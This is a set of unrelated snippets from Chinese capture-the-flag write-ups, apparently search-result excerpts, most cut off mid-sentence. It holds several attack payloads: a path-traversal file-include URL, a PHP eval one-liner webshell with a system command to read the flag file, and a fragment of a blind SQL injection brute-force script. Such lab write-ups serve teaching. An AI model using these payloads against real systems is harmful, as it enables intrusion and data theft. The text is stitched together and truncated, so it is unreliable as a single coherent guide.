1、打开场景发现是一个登录界面,为一个空白页面,查看页面源码,源码中有注释源码“flag is not here” 2、提示信息有Robots协议,于是访问“http://61.147.171.105:55526/robots.php”,里面揭示了一些其他文件,其中存在"Disallow : f1ag_1s_h3re.php" 3、访问“http://61.147.171.105:55526/f1ag_1s_h3re.php...
打开此文件后,就看到这句话“Flag_is_not_here”其余的没有发现重大的内容将然后将txt文档拖入到Winhex中进行分析,发现了一段隐藏的代码 题目说这是0和1的故事,将09、20分别看成一个整体,并分别进行二进制的转换 09看成1、20看成0 10010101101010110010011100011101010111100001110111111000000 2 1100110000011111001010100111...
发现flagishere.txt,访问得到flag,访问admin,需要账号和密码,账号填admin,密码根据提示在页面上找到了一串数字,应该就是密码了,尝试登陆得到flag。
点击OK,直接跳转到flag所在位置,发现flag: flag{bGxvdmV0aGVnaXJs} 到此处后大多数同学会选择直接提交flag,提交后发现并不正确…… 仔细观察{}中间的字符串会发现该字符串包含大、小写字母以及数字,首先考虑该字符串为原flag的{}中间内容经过base64计算后的字符串,使用Python或其他工具进行base64解密: 得到最终flag...
y='flag is not here'# 正确时网页包含内容 start=0# 字符串的开始字符位置 strlen=80# 待爆破字符串的长度 sleep_time=0ostr='^'# str2find='(database())'#CTF# str2find='password'# This_1s_thE_Passw0rd str2find='username'# str2find='(select flag from flag)'# 想查询的字符串、语句...
当然这里面还有一个hint.php,进去发现了提示:flag not here, and flag in ffffllllaaaagggg 。。。 事实上,确实在根目录下的ffffllllaaaagggg里面。 payload: http://web5.buuoj.cn/?file=hint.php%253F/../../../../ffffllllaaaagggg 随便注 这道...
Web where_is_the_flag <?php//flag一分为3,散落在各处,分别是:xxxxxxxx、xxxx、xxx。highlight_file(__FILE__);//标准一句话木马~eval($_POST[1]);?> payload: 第一部分在当前目录的flag.php,这里好像把cat过滤掉了,所以用tac 1=system('tac flag.php'); ...
if (preg_match('/.+?HACKER/is',$try)){die("你是hacker还敢自报家门呢?");}if (!stripos($try,'HACKER') === TRUE){die("你连自己是hacker都不承认,还想要flag呢?");} 利用正则回溯绕过。 然后是 if(stripos($b,'php')!==0){die("收手吧hacker,你得不到flag的!");}echo (new $a($...
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) { include $_REQUEST['file'];exit;} else { echo "";} > hint.php flag not here, and flag in ffffllllaaaagggg 解题思路 利⽤include()包含ffffllllaaaagggg⽂件 代码审计 ...
flag not here,and flaginffffllllaaaagggg 返回继续看刚才的代码,最下方有一小块代码,先解决他。 代码语言:javascript 复制 if(!empty($_REQUEST['file'])&&is_string($_REQUEST['file'])&&emmm::checkFile($_REQUEST['file'])){include $_REQUEST['file'];exit;}else{echo"";} $_REQUEST['file']...